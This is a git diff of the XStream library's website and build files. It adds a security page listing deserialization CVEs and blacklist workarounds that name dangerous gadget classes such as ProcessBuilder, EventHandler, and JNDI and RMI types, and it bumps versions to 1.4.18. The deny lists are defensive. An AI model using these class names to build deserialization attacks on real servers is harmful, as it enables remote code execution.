+ <h2 id="1.4.16"><b>March 13, 2021</b> XStream 1.4.16 released</h2>
+
+ <p class="highlight">This maintenance release switches XStream's default parser and addresses following security
+ vulnerabilities, when unmarshalling with an XStream instances using an uninitialized security framework:
+ <a href="CVE-2021-21341.html">CVE-2021-21341</a>,
+ <a href="CVE-2021-21342.html">CVE-2021-21342</a>,
+ <a href="CVE-2021-21343.html">CVE-2021-21343</a>,
+ <a href="CVE-2021-21344.html">CVE-2021-21344</a>,
+ <a href="CVE-2021-21345.html">CVE-2021-21345</a>,
+ <a href="CVE-2021-21346.html">CVE-2021-21346</a>,
+ <a href="CVE-2021-21347.html">CVE-2021-21347</a>,
+ <a href="CVE-2021-21348.html">CVE-2021-21348</a>,
+ <a href="CVE-2021-21349.html">CVE-2021-21349</a>,
+ <a href="CVE-2021-21350.html">CVE-2021-21350</a>, and
+ <a href="CVE-2021-21351.html">CVE-2021-21351</a>.
+ </p>
+
+ <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
+
+ <p>Note, the next major release 1.5 will require Java 8.</p>
+
<h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2>
<p class="highlight">This maintenance release addresses the security vulnerabilities
diff --git a/xstream-distribution/src/content/security.html b/xstream-distribution/src/content/security.html
index 036cbd747a8aeb881c8d4443a3749dd29d740535..78f70d9dcef26ca4892b1c40a3715028f139995d 100644
--- a/xstream-distribution/src/content/security.html
+++ b/xstream-distribution/src/content/security.html
@@ -1,6 +1,6 @@
<html>
<!--
- Copyright (C) 2014, 2015, 2017, 2019, 2020 XStream committers.
+ Copyright (C) 2014, 2015, 2017, 2019, 2020, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -18,9 +18,6 @@
XML, and XML to Java objects. As a result, it is possible to create an instance of XStream with the default
constructor, call a method to convert an object into XML, then call another method to turn the XML back into an
equivalent Java object. By design, there are few limits to the type of objects XStream can handle.</p>
-
- <p class=highlight>Note: XStream supports other data formats than XML, e.g. JSON. Those formats can be used for
- the same attacks.</p>
<p>This flexibility comes at a price. XStream applies various techniques under the hood to ensure it is able to
handle all types of objects. This includes using undocumented Java features and reflection. The XML generated by
@@ -30,16 +27,202 @@
<p>The provided XML data is used by XStream to unmarshal Java objects. This data can be manipulated by injecting
the XML representation of other objects, that were not present at marshalling time. An attacker could take
advantage of this to access private data, delete local files, execute arbitrary code or shell commands in the
- context of the server running the XStream process. Concrete cases are described in
- <a href="CVE-2013-7285.html">CVE-2013-7285</a>, <a href="CVE-2020-26217.html">CVE-2020-26217</a>,
- <a href="CVE-2020-26258.html">CVE-2020-26258</a>, and <a href="CVE-2020-26259.html">CVE-2020-26259</a>.</p>
+ context of the server running the XStream process or cause a denial of service by crashing the application or
+ manage to enter an endless loop consuming 100% of CPU cycles.</p>
+
+ <p class=highlight>Note: XStream supports other data formats than XML, e.g. JSON. Those formats can be used for
+ the same attacks.</p>
<p>Note, that the XML data can be manipulated on different levels. For example, manipulating values on existing
objects (such as a price value), accessing private data, or breaking the format and causing the XML parser to fail.
The latter case will raise an exception, but the former case must be handled by validity checks in any application
- which processes user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above.
- Even worse, <a href="CVE-2017-7957.html">CVE-2017-7957</a> describes a case to crash the Java Virtual Machine
- causing a Denial of Service.</p>
+ which processes user-supplied XML.</p>
+
+ <h2 id="CVEs">Documented Vulnerabilities</h2>
+
+ <p>Over the years, several of these attacks have been reported and documented in the Common Vulnerability and
+ Exposure (CVE) system managed by the <a href="http://www.mitre.org/">Mitre Corporation</a>. Following a list of the
+ reported vulnerabilities for the different versions:</p>
+
+ <table summary="Table of reported vulnerabilities documented as CVE">
+ <tr>
+ <th>CVE</th>
+ <th>Description</th>
+ </tr>
+ <tr>
+ <th>Version 1.4.17</th>
+ <td></td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39139.html">CVE-2021-39139</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39140.html">CVE-2021-39140</a></th>
+ <td>XStream can cause a Denial of Service.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39141.html">CVE-2021-39141</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39144.html">CVE-2021-39144</a></th>
+ <td>XStream is vulnerable to a Remote Command Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39145.html">CVE-2021-39145</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39146.html">CVE-2021-39146</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39147.html">CVE-2021-39147</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39148.html">CVE-2021-39148</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39149.html">CVE-2021-39149</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39150.html">CVE-2021-39150</a></th>
+ <td>A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an
+ arbitrary URL referencing a resource in an intranet or the local host.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39151.html">CVE-2021-39151</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39152.html">CVE-2021-39152</a></th>
+ <td>A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an
+ arbitrary URL referencing a resource in an intranet or the local host.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39153.html">CVE-2021-39153</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-39154.html">CVE-2021-39154</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th>Version 1.4.16</th>
+ <td></td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-29505.html">CVE-2021-29505</a></th>
+ <td>XStream is vulnerable to a Remote Command Execution attack.</td>
+ </tr>
+ <tr>
+ <th>Version 1.4.15</th>
+ <td></td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-21341.html">CVE-2021-21341</a></th>
+ <td>XStream can cause a Denial of Service.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-21342.html">CVE-2021-21342</a></th>
+ <td>A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an
+ arbitrary URL referencing a resource in an intranet or the local host.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-21343.html">CVE-2021-21343</a></th>
+ <td>XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the
+ executing process has sufficient rights.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-21344.html">CVE-2021-21344</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-21345.html">CVE-2021-21345</a></th>
+ <td>XStream is vulnerable to a Remote Command Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-21346.html">CVE-2021-21346</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-21347.html">CVE-2021-21347</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-21348.html">CVE-2021-21348</a></th>
+ <td>XStream is vulnerable to an attack using Regular Expression for a Denial of Service (ReDos).</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-21349.html">CVE-2021-21349</a></th>
+ <td>A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an
+ arbitrary URL referencing a resource in an intranet or the local host.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-21350.html">CVE-2021-21350</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2021-21351.html">CVE-2021-21351</a></th>
+ <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td>
+ </tr>
+ <tr>
+ <th>Version 1.4.14</th>
+ <td></td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2020-26258.html">CVE-2020-26258</a></th>
+ <td>A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an
+ arbitrary URL referencing a resource in an intranet or the local host.</td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2020-26259.html">CVE-2020-26259</a></th>
+ <td>XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the
+ executing process has sufficient rights.</td>
+ </tr>
+ <tr>
+ <th>Version 1.4.13</th>
+ <td></td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2020-26217.html">CVE-2020-26217</a></th>
+ <td>XStream can be used for Remote Code Execution.</td>
+ </tr>
+ <tr>
+ <th>Version 1.4.9</th>
+ <td></td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2017-7957.html">CVE-2017-7957</a></th>
+ <td>XStream can cause a Denial of Service when unmarshalling void.</td>
+ </tr>
+ <tr>
+ <th>Version 1.4.8</th>
+ <td></td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2016-3674.html">CVE-2016-3674</a></th>
+ <td>XML External Entity (XXE) Vulnerability in XStream.</td>
+ </tr>
+ <tr>
+ <th>Version 1.4.6 (and 1.4.10)</th>
+ <td></td>
+ </tr>
+ <tr>
+ <th><a href="CVE-2013-7285.html">CVE-2013-7285</a></th>
+ <td>XStream can be used for Remote Code Execution.</td>
+ </tr>
+ </table>
+
+ <p>See <a href="#workaround">workarounds</a> for the different versions covering all the CVEs listed here.</p>
+
+ <p class="hightlight">This list contains only vulnerabilities, that could be created using the Java runtime with
+ XStream. Vulnerabilities introduced by using additional 3rd party libraries and classes are beyond XStream's
+ responsibility.</p>
<h2 id="external">External Security</h2>
@@ -54,36 +237,26 @@
<h2 id="implicit">Implicit Security</h2>
<p>As explained above, it is possible to inject other object instances if an attacker is able to define the data
- used to deserialize the Java objects. E.g. a known exploit can be created with the help of the Java runtime
- library using the Java Bean <a href="http://docs.oracle.com/javase/7/docs/api/java/beans/EventHandler.html">EventHandler</a>
- as described in <a href="CVE-2013-7285.html">CVE-2013-7285</a>. This scenario can be used perfectly to
- replace/inject a dynamic proxy with such an EventHandler at any location in the XML where its parent expects an
- object of such an interface's type or a simple object instance (any list element will suffice). The usage of a
- ProcessBuilder as an embedded element, coupled with the redirection of any call to the ProcessBuilder's
- <a href="http://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html#start()">start()</a> method allows
- an attacker to call shell commands. Knowing how to define such an attack is the only prerequisite.</p>
+ used to deserialize the Java objects, see the different CVEs. Knowing how to define such an attack is the only
+ prerequisite.</p>
       Â
- <p>More scenarios have been identified for types that are already delivered with the Java runtime. Looking at
- well-known and commonly used Java libraries libraries such as ASM, CGLIB, or Groovy, the possibility for more
- exploits is very high. A class like InvokerTransformer of Apache Commons Collections has a high potential for
- attacks.</p>
+ <p>All those scenarios were based on types that are delivered with the Java runtime at some version. Looking at
+ other well-known and commonly used Java libraries libraries such as ASM, CGLIB, or Groovy, you will have to assume
+ other scenarios for exploits as well. A class like InvokerTransformer of Apache Commons Collections has a high
+ potential for attacks. By default XStream 1.4.18 works now with a whitelist. If you modify the default setup, it
+ is also your responsibility to protect your clients from such vulnerabilities.</p>
+ Â Â Â Â Â Â Â Â
+ <p>Note: This vulnerability is not even a special problem of XStream. XML being deserialized by XStream acts here
+ like a script, and the scenario above can be created with any script that is executed within a Java runtime (e.g.
+ using its JavaScript interpreter) if someone is able to manipulate it externally. The key message for application
+ developers is that deserializing arbitrary user-supplied content is a dangerous proposition in all cases. The best
+ approach to prevent such an attach is a <a href="#example">whitelist</a>, i.e. the deserialization mechanism should
+ only allow explicit types. See also the advice for vulnerabilities using
+ <a href="https://docs.oracle.com/javase/10/core/serialization-filtering1.htm">Java Serialization</a>.</p>
<p class="hightlight">A blacklist for special classes only creates therefore a scenario for a false security,
- because no-one can assure, that no other scenario arise. A better approach is the usage of a whitelist i.e. the
- allowed class types are setup explicitly. This will be the default for XStream 1.5.x (see below).</p>
-
- <p>Starting with XStream 1.4.7, an instance of the EventHandler is no longer handled by default. You have to
- explicitly register a ReflectionConverter for the EventHandler type, if your application has the requirement to
- persist such an object. Starting with XStream 1.4.10 the list of revoked types is enhanced by all types of the
- java.crypto package and any inner class named LazyIterator. On top you still have to take special care regarding
- the location of the persisted data, and how your application can ensure its integrity.</p>
- Â Â Â Â Â Â Â Â
- <p class=highlight>Note: This vulnerability is not even a special problem of XStream. XML being deserialized by
- XStream acts here like a script, and the scenario above can be created with any script that is executed within a
- Java runtime (e.g. using its JavaScript interpreter) if someone is able to manipulate it externally. The key
- message for application developers is that deserializing arbitrary user-supplied content is a dangerous proposition
- in all cases. The best approach to prevent such an attach is a <a href="#example">whitelist</a>, i.e. the
- deserialization mechanism should only allow explicit types.</p>
+ because no-one can assure, that no other vulnerability is found. A better approach is the usage of a whitelist
+ i.e. the allowed class types are setup explicitly. This is the default for XStream 1.4.18 (see below).</p>
<h2 id="explicit">Explicit Security</h2>
   Â
@@ -93,17 +266,18 @@
framework supports the setup of a blacklist or whitelist scenario. Any application should use this feature to
limit the danger of arbitrary command execution if it deserializes data from an external source.</p>
- <p>XStream itself sets up a blacklist by default, i.e. it blocks all currently known critical classes of the Java
- runtime. Main reason for the blacklist is compatibility, because otherwise newer versions of XStream 1.4.x can no
- longer be used as drop-in replacement. Unfortunately this provides a false sense of security. Every XStream
- client should therefore switch to a whitelist on its own as soon as possible. XStream itself will use a whitelist
- as default starting with 1.5.x and only clients that have also changed their setup will be able to use this newer
- version again as drop-in replacement. You can use
- <a href="javadoc/com/thoughtworks/xstream/XStream.html#setupDefaultSecurity-com.thoughtworks.xstream.XStream-">XStream.setupDefaultSecurity()</a>
- to install the default whitelist of 1.5.x already with 1.4.10 or higher.</p>
+ <p>XStream itself sets up a whitelist by default, i.e. it blocks all classes except those types it has explicit
+ converters for. Until version 1.4.17 it used a blacklist by default, i.e. it tried to block all currently known
+ critical classes of the Java runtime. Main reason for the blacklist were compatibility, it allowed to use newer
+ versions of XStream as drop-in replacement. However, this approach has failed. A growing list of security reports
+ has proven, that a blacklist is inherently unsafe, apart from the fact that types of 3rd libraries were not even
+ considered. XStream provides the ability to setup a whitelist since version 1.4.7, a version released nine years
+ before 1.4.18. Clients who have adapted their setup and initialize the security framework are able to use newer
+ versions again as drop-in replacement. A blacklist scenario should be avoided in general, because it provides a
+ false sense of security.</p>
       Â
- <p class=highlight>Note: If a type on a whitelist contains itself other members that are handled by XStream, you
- will have to add those member's types to the whitelist also.</p>
+ <p class=highlight>Note: If a type on a whitelist contains itself other members that are handled by XStream, you
+ will have to add those member's types to the whitelist also. There is no automatism for indirect references.</p>
       Â
<p>Separate to the XStream security framework, it has always been possible to overwrite the setupConverter method
of XStream to register only the required converters.</p>
@@ -115,7 +289,7 @@
<p>XML itself supports input validation using a schema and a validating parser. With XStream, you can use e.g. a
DOM parser for validation, but it will take some effort to ensure that the XML read and written by XStream matches
- the schema in first place, because XStream uses additionally own attributes. Typically you will have to write some
+ the schema in first place, because XStream uses additionally own attributes. Typically you will have to write some
custom converters, but it can be worth the effort depending on the use case.</p>
<h1 id="framework">Security Framework</h1>
@@ -125,12 +299,12 @@
EventHandler. To prevent such a possibility at all, XStream version 1.4.7 and above contains a security framework,
allowing application developers to define which types are allowed to be unmarshalled with XStream. Use
<a href="javadoc/com/thoughtworks/xstream/XStream.html#setupDefaultSecurity-com.thoughtworks.xstream.XStream-">XStream.setupDefaultSecurity()</a>
- to install the default whitelist of 1.5.x already with 1.4.10 or higher.</p></p>
+ to install the default whitelist of 1.4.18 already with 1.4.7 to 1.4.10.</p>
       Â
<p>The core interface is <a href="javadoc/com/thoughtworks/xstream/security/TypePermission.html">TypePermission</a>.
The <a href="javadoc/com/thoughtworks/xstream/mapper/SecurityMapper.html">SecurityMapper</a> will evaluate a list
of registered instances for every type that will be required while unmarshalling input data. The interface has one
- simple method:</p><div class="Source Java"><pre>boolean allow(Class<?>);</pre></div>
+ simple method:</p><div class="Source Java"><pre>boolean allow(Class);</pre></div>
       Â
<p>The <a href="javadoc/com/thoughtworks/xstream/XStream.html">XStream</a> facade provides the following methods to
register such type permissions within the SecurityMapper:</p><div class="Source Java">
@@ -248,7 +422,7 @@ XStream.denyTypeHierary(Class);</pre></div>
<h2 id="example">Example Code Whitelist</h2>
- <p>XStream uses the AnyTypePermission by default, i.e. any type is accepted. You have to clear out this default
+ <p>XStream uses the AnyTypePermission by default, i.e. any type is accepted. You have to clear out this default
and register your own permissions to activate the security framework (the Blog type is from the
<a href="alias-tutorial.html">Alias Tutorial</a>):</p>
<div class="Source Java"><pre>XStream xstream = new XStream();
@@ -264,6 +438,71 @@ xstream.allowTypesByWildcard(new String[] {
});
</pre></div>
- <p>You may have a further look at XStream's acceptance tests, the security framework is enabled there in general.</p>
+ <p>You may have a further look at XStream's acceptance tests, the security framework is enabled there in general.</p>
+ Â Â Â Â Â Â Â Â
+ <h2 id="workaround">Workarounds for older XStream versions</h2>
+
+ <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types. This is
+ possible since XStream 1.4.7 and it is the default since XStream 1.4.18.</p>
+
+ <p>Users of XStream 1.4.17 who insist to use XStream default blacklist - despite that clear recommendation - can
+ add these lines to XStream's setup code:</p>
+<div class="Source Java"><pre>xstream.denyTypesByWildcard(new String[]{ "sun.reflect.**", "sun.tracing.**", "com.sun.corba.**" });
+xstream.denyTypesByRegExp(new String[]{ ".*\\.ws\\.client\\.sei\\..*", ".*\\$ProxyLazyValue", "com\\.sun\\.jndi\\..*Enumerat(?:ion|tor),.*\\$URLData" });
+</pre></div>
+
+ <p>Users of XStream 1.4.16 should add these lines and <strong>additionally</strong> the lines for version 1.4.17:</p>
+<div class="Source Java"><pre>xstream.denyTypesByRegExp(new String[]{ ".*\\.Lazy(?:Search)?Enumeration.*", "(?:java|sun)\\.rmi\\..*" });
+</pre></div>
+
+ <p>Users of XStream 1.4.15 should add these lines and <strong>additionally</strong> the lines for version 1.4.16 and 1.4.17:</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "sun.awt.datatransfer.DataTransferer$IndexOrderComparator", "com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator" });
+xstream.denyTypesByRegExp(new String[]{ ".*\\$ServiceNameIterator", "(javax|sun.swing)\\..*LazyValue", "javafx\\.collections\\.ObservableList\\$.*", ".*\\.bcel\\..*\\.util\\.ClassLoader" });
+xstream.denyTypeHierarchy(java.io.InputStream.class );
+xstream.denyTypeHierarchy(java.nio.channels.Channel.class );
+xstream.denyTypeHierarchy(javax.activation.DataSource.class );
+xstream.denyTypeHierarchy(javax.sql.rowset.BaseRowSet.class );
+</pre></div>
+
+ <p>Users of XStream 1.4.13 and 1.4.14 should add these lines and <strong>additionally</strong> the lines for version 1.4.15 to 1.4.17:</p></p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
+</pre></div>
+
+ <p>Users of XStream 1.4.7 to 1.4.12 who want to use XStream with a blacklist will have to setup such a list from
+ scratch:</p>
+<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "sun.awt.datatransfer.DataTransferer$IndexOrderComparator", "com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
+xstream.denyTypesByRegExp(new String[]{ ".*\\$ServiceNameIterator", "javafx\\.collections\\.ObservableList\\$.*", ".*\\.bcel\\..*\\.util\\.ClassLoader", ".*\\$GetterSetterReflection", ".*\\$LazyIterator", ".*\\$PrivilegedGetter", ".*\\.ws\\.client\\.sei\\..*", ".*\\$ProxyLazyValue", "com\\.sun\\.jndi\\..*Enumerat(?:ion|tor)", ".*\\$URLData" });
+xstream.denyTypesByWildcard(new String[]{ "sun.reflect.**", "sun.tracing.**", "com.sun.corba.**" });
+xstream.denyTypeHierarchy(java.io.InputStream.class);
+xstream.denyTypeHierarchy(java.nio.channels.Channel.class);
+xstream.denyTypeHierarchy(javax.activation.DataSource.class);
+xstream.denyTypeHierarchy(javax.sql.rowset.BaseRowSet.class);
+</pre></div>
+
+ <p>Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently
+ know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:</p>
+<div class="Source Java"><pre>xstream.registerConverter(new Converter() {
+ public boolean canConvert(Class type) {
+ return type != null
+ && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class || type == java.lang.Void.class || void.class
+ || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("sun.awt.datatransfer.DataTransferer$IndexOrderComparator") || type.getName().equals("com.sun.corba.se.impl.activation.ServerTableEntry") || type.getName().equals("com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator")
+ || type.getName().matches("javafx\\.collections\\.ObservableList\\$.*") || type.getName().matches(".*\\$ServiceNameIterator") || type.getName().matches(".*\\$GetterSetterReflection") || type.getName().matches(".*\\$LazyIterator") || type.getName().matches(".*\\$ProxyLazyValue") || type.getName().matches(".*\\.bcel\\..*\\.util\\.ClassLoader") || type.getName().matches(".*\\.ws\\.client\\.sei\\..*") || type.getName().matches("com\\.sun\\.jndi\\..*Enumerat(?:ion|tor)") || type.getName().matches(".*\\$URLData")
+ || type.getName().startsWith("sun.reflect.") || type.getName().startsWith("sun.tracing.") || type.getName().startsWith("com.sun.corba.")
+ || java.io.InputStream.class.isAssignableFrom(type) || java.nio.channels.Channel.isAssignableFrom(type) || javax.activation.DataSource.isAssignableFrom(type) ||javax.sql.rowset.BaseRowSet.isAssignableFrom(type)
+ || Proxy.isProxy(type));
+ }
+
+ public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
+ throw new ConversionException("Unsupported type due to security reasons.");
+ }
+
+ public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
+ throw new ConversionException("Unsupported type due to security reasons.");
+ }
+}, XStream.PRIORITY_VERY_HIGH);
+</pre></div>
+
</body>
</html>
diff --git a/xstream-distribution/src/content/website.xml b/xstream-distribution/src/content/website.xml
index c01aa060403255a28654c40900f9812025af1370..157baeb93a52f8809c115a700d0eca09ffe88922 100644
--- a/xstream-distribution/src/content/website.xml
+++ b/xstream-distribution/src/content/website.xml
@@ -1,6 +1,6 @@
<!--
Copyright (C) 2005, 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016, 2017, 2020 XStream committers.
+ Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016, 2017, 2020, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -15,13 +15,12 @@
<page>index.html</page>
<page>news.html</page>
<page>changes.html</page>
+ <page>security.html</page>
<page>versioning.html</page>
</section>
<section>
<name>Evaluating XStream</name>
<page>tutorial.html</page>
- <page>graphs.html</page>
- <page>manual-tweaking-output.html</page>
<page>license.html</page>
<page>download.html</page>
<page>references.html</page>
@@ -31,8 +30,9 @@
<section>
<name>Using XStream</name>
<page>architecture.html</page>
+ <page>graphs.html</page>
+ <page>manual-tweaking-output.html</page>
<page>converters.html</page>
- <page>security.html</page>
<page>faq.html</page>
<page>mailing-lists.html</page>
<page>issues.html</page>
@@ -43,15 +43,6 @@
<link title="Hibernate Extensions">hibernate-javadoc/index.html</link>
<link title="JMH Module">jmh-javadoc/index.html</link>
</section>
- <section>
- <name>Vulnerabilities</name>
- <page>CVE-2020-26259.html</page>
- <page>CVE-2020-26258.html</page>
- <page>CVE-2020-26217.html</page>
- <page>CVE-2017-7957.html</page>
- <page>CVE-2016-3674.html</page>
- <page>CVE-2013-7285.html</page>
- </section>
<section>
<name>Tutorials</name>
<page>tutorial.html</page>
@@ -70,4 +61,39 @@
<page>repository.html</page>
<link title="Continuous Integration">https://travis-ci.org/x-stream/xstream/branches</link>
</section>
+ <section>
+ <name>!Vulnerabilities</name>
+ <page>CVE-2021-21341.html</page>
+ <page>CVE-2021-21342.html</page>
+ <page>CVE-2021-21343.html</page>
+ <page>CVE-2021-21344.html</page>
+ <page>CVE-2021-21345.html</page>
+ <page>CVE-2021-21346.html</page>
+ <page>CVE-2021-21347.html</page>
+ <page>CVE-2021-21348.html</page>
+ <page>CVE-2021-21349.html</page>
+ <page>CVE-2021-21350.html</page>
+ <page>CVE-2021-21351.html</page>
+ <page>CVE-2021-29505.html</page>
+ <page>CVE-2021-39139.html</page>
+ <page>CVE-2021-39140.html</page>
+ <page>CVE-2021-39141.html</page>
+ <page>CVE-2021-39144.html</page>
+ <page>CVE-2021-39145.html</page>
+ <page>CVE-2021-39146.html</page>
+ <page>CVE-2021-39147.html</page>
+ <page>CVE-2021-39148.html</page>
+ <page>CVE-2021-39149.html</page>
+ <page>CVE-2021-39150.html</page>
+ <page>CVE-2021-39151.html</page>
+ <page>CVE-2021-39152.html</page>
+ <page>CVE-2021-39153.html</page>
+ <page>CVE-2021-39154.html</page>
+ <page>CVE-2020-26217.html</page>
+ <page>CVE-2020-26258.html</page>
+ <page>CVE-2020-26259.html</page>
+ <page>CVE-2017-7957.html</page>
+ <page>CVE-2016-3674.html</page>
+ <page>CVE-2013-7285.html</page>
+ </section>
</sitemap>
diff --git a/xstream-distribution/src/templates/skin.html b/xstream-distribution/src/templates/skin.html
index d2dc8e2776d6c32598fca0faf0385d86ac5c9347..425d3faad11539b18168de6b4c7b41d42d6c1979 100644
--- a/xstream-distribution/src/templates/skin.html
+++ b/xstream-distribution/src/templates/skin.html
@@ -2,7 +2,7 @@
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Copyright (C) 2005, 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2008 XStream committers.
+ Copyright (C) 2006, 2007, 2008, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -44,18 +44,20 @@
<div class="SidePanel" id="left">
<#list sitemap.sections as section>
- <div class="MenuGroup">
- <h1>${section.name}</h1>
- <ul>
- <#list section.entries as entry>
- <#if entry = page>
- <li class="currentLink">${entry.title}</li>
- <#else>
- <li><a href="${entry.href}">${entry.title}</a></li>
- </#if>
- </#list>
- </ul>
- </div>
+ <#if !section.name?starts_with("!")>
+ <div class="MenuGroup">
+ <h1>${section.name}</h1>
+ <ul>
+ <#list section.entries as entry>
+ <#if entry = page>
+ <li class="currentLink">${entry.title}</li>
+ <#else>
+ <li><a href="${entry.href}">${entry.title}</a></li>
+ </#if>
+ </#list>
+ </ul>
+ </div>
+ </#if>
</#list>
</div>
diff --git a/xstream-hibernate/pom.xml b/xstream-hibernate/pom.xml
index d50dd6fa80be9acaa48d4019c2315cc58fa5f4ca..24eb7ab15764a1783d8b1fee6877324db52c3872 100644
--- a/xstream-hibernate/pom.xml
+++ b/xstream-hibernate/pom.xml
@@ -13,7 +13,7 @@
<parent>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
</parent>
<artifactId>xstream-hibernate</artifactId>
<packaging>jar</packaging>
diff --git a/xstream-jmh/pom.xml b/xstream-jmh/pom.xml
index 604090bb5f8cc940384ac6261dfd3415d351d937..f043917762b4698ff56553c19d5a4e458a983baa 100644
--- a/xstream-jmh/pom.xml
+++ b/xstream-jmh/pom.xml
@@ -1,6 +1,6 @@
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<!--
- Copyright (C) 2015, 2017, 2020 XStream committers.
+ Copyright (C) 2015, 2017, 2020, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -13,7 +13,7 @@
<parent>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
</parent>
<artifactId>xstream-jmh</artifactId>
<packaging>jar</packaging>
@@ -175,13 +175,13 @@
</dependency>
<!-- parser -->
<dependency>
- <groupId>xpp3</groupId>
- <artifactId>xpp3_min</artifactId>
+ <groupId>io.github.x-stream</groupId>
+ <artifactId>mxparser</artifactId>
<scope>runtime</scope>
</dependency>
<dependency>
- <groupId>xmlpull</groupId>
- <artifactId>xmlpull</artifactId>
+ <groupId>xpp3</groupId>
+ <artifactId>xpp3_min</artifactId>
<scope>runtime</scope>
</dependency>
<dependency>
diff --git a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ConverterTypeBenchmark.java b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ConverterTypeBenchmark.java
index 85fe8155824718784eebf5551f54e0ba4b1a0f7b..8b01de10889fd939fae9f5e93870e85aa58c973c 100644
